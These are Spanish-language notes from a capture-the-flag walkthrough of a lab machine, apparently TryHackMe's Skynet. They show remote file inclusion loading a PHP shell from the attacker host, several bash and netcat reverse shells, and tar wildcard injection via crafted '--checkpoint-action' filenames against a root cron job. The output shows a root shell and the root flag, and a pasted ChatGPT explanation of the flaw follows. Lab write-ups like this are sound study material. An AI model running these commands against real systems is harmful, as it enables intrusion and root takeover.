/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/js/image.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/editor_template_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/editor_template.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/img/button_bg_silver.png
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/img/button_bg_black.png
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/img/button_bg.png
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/ui_silver.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/dialog.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/o2k7/ui_black.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img/menu_check.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img/menu_arrow.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img/items.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img/tabs.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img/buttons.png
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/img/progress.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/dialog.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast/dialog.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/source_editor.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/shortcuts.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/langs
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/langs/en.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/langs/en_dlg.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/charmap.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/anchor.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/about.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/img/icons.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/editor_template_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/editor_template.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/img/button_bg.png
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/default
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/default/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/default/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/langs
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/langs/en.js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery.js
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/uploadify.php
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/uploadify.css
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/jquery.uploadify.js
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/cancel.png
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/expressInstall.swf
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/jquery.js
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/check.php
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/uploadify.swf
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/swfobject.js
/var/www/html/45kra24zxs28v3yd/administrator/js/swfobject.js
/var/www/html/45kra24zxs28v3yd/administrator/classes
/var/www/html/45kra24zxs28v3yd/administrator/classes/DataBase.php
/var/www/html/45kra24zxs28v3yd/administrator/classes/Security.php






////////////////// RECONECTAMOS Y CONTINUAMOS LA MAQUINA DESDED DONDE DEJAMOS   ///////


http://10.10.131.229/45kra24zxs28v3yd/administrator/

http://10.10.131.229/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.241.89:8080/shellpaimon.php







cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
pwd
/var/www/html/45kra24zxs28v3yd/administrator/alerts
env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/45kra24zxs28v3yd/administrator/alerts
env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


VEMOS LA VERSION DE KERNEL; SISTEMA Y COMPILADOR:

cat /proc/version
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
cat /etc/issue
Ubuntu 16.04.6 LTS \n \l




VEMOS DENTRO DEL ARCHIVO BACKUP.SH :



cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *





CREAMOS NUESTRO PAYLOAD PARA SER EJECUTADO POR ROOT EN LAS CRON HOBS Y ESCALAR LOS PRIVILEGIOS A LA ESCUCHA CON NETCAT:


#!/bin/bash

bash -i >& /dev/tcp/10.10.241.89/4445 0>&1




LO AGREGAMOS AL ARCHIVO NUESTRA REVERSE SHELL BACKUP.SH PERO EN EL DIRECTORIO DE MILES NO NOS DEJA , ASI QUE LO AGRAGAMOS POR AHORA EN EL DIRECTORIO QUE APUNTA EL BACKUP.SH ORIGINAL /var/www/html el cual sera comprimido con TAR  :



echo '#!/bin/bash' > backup.sh && echo 'bash -i >& /dev/tcp/10.10.241.89/4445 0>&1' >> backup.sh



echo '#!/bin/bash' >> ~/.bash_history && echo 'bash -i >& /dev/tcp/10.10.241.89/4445 0>&1' >> ~/.bash_history


export PATH=/ejemplo:$PATH





NO FUNCIONO NINGUN METODO HASTA AHORA, NI LOS DE 4 WRITUPS QUE VIMOS LUEGO.....!!!!!




--------------- PROBAMOS OTRO METODO APROBECHANDO DE CRONTABS EJECUTADAS POR ROOT DEL ARCHIVO BACKUP.SH Y APROBECHANDO TAMBIEN UNA VULNERABILIDAD EN COMO "TAR" AL COMPRIMIR TARATA MAL A LOS NOMBRES ESPECIALES DE LOS ARCHIVOS QUE VAMOS ACREAR CON UNA SHELL REVERSA QUE ESCUCHAREMOS CON NUESTRO NETCAT Y RECIBIREMOS UNA SHELL DE ROOT POR QUIEN ES EJECUTADA ESTA TAREA CRONHOBS PRINCIPAL :



EN EL DIRECTORIO VAR/www/html CREAMOS ESTE ARCHIVO SHELL.SH:




echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.241.89 4445 >/tmp/f" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"







ESCUCHAMOS MIENTRAS CON NETCAT Y BINGO AL FIN SE TENZO CONSEGUIMOS ROOT Y SU BANDERA::



┌──(root㉿kali)-[~]
└─# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.241.89] from (UNKNOWN) [10.10.68.112] 50760
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# pwd
/var/www/html
# cd /root
# ls
root.txt
# cat root.txt
3f0372db24753accc7179a282cd6a949
# id
uid=0(root) gid=0(root) groups=0(root)




EXPLICACION DE LA VULNERABILIDAD SEGUN YO Y GPT:




mira ahi unas crontab ejecutadas por root, que apuntan a ejecutar este archivo con su contenidio: cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *  . y si vemos este script .sh se va al directorio cd /var/www/html y usa tar para comprimir todo lo que hay en el, sera aqui la bulnerabilidad por parte de como trata tar los nombres especiales e los archivos que creamos antes al comprimirlos y en realidad por esta vulnerabilidad los termina ejecutando como root dandome la shell indirectamente como root en mi netcat ?
ChatGPT
Sí, parece que has identificado correctamente la posible vulnerabilidad en el script backup.sh que se ejecuta a través de las crontabs como root. Vamos a analizarlo en detalle:

bash
Copy code
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz * .
Aquí se explica lo que hace el script:

Cambia al directorio /var/www/html.
Utiliza el comando tar para crear un archivo backup.tgz en el directorio /home/milesdyson/backups.
tar cf /home/milesdyson/backups/backup.tgz * . indica que se debe incluir todo (*) en el directorio actual (.) en el archivo backup.tgz.
Ahora, si recordamos los archivos que creaste anteriormente:

/var/www/html/--checkpoint-action=exec=sh shell.sh
/var/www/html/--checkpoint=1
Parece que podrías aprovechar la vulnerabilidad en la forma en que tar maneja los nombres de archivos especiales. Si el script de copia de seguridad (backup.sh) es ejecutado por root, y tar interpreta de manera incorrecta los nombres de archivos especiales, podrías lograr la ejecución de comandos arbitrarios en el contexto de root.

Esto podría ser un caso de inyección de comandos a través de nombres de archivos maliciosos que son interpretados por tar de manera incorrecta. Será necesario realizar pruebas adicionales para confirmar la explotación de esta vulnerabilidad específica.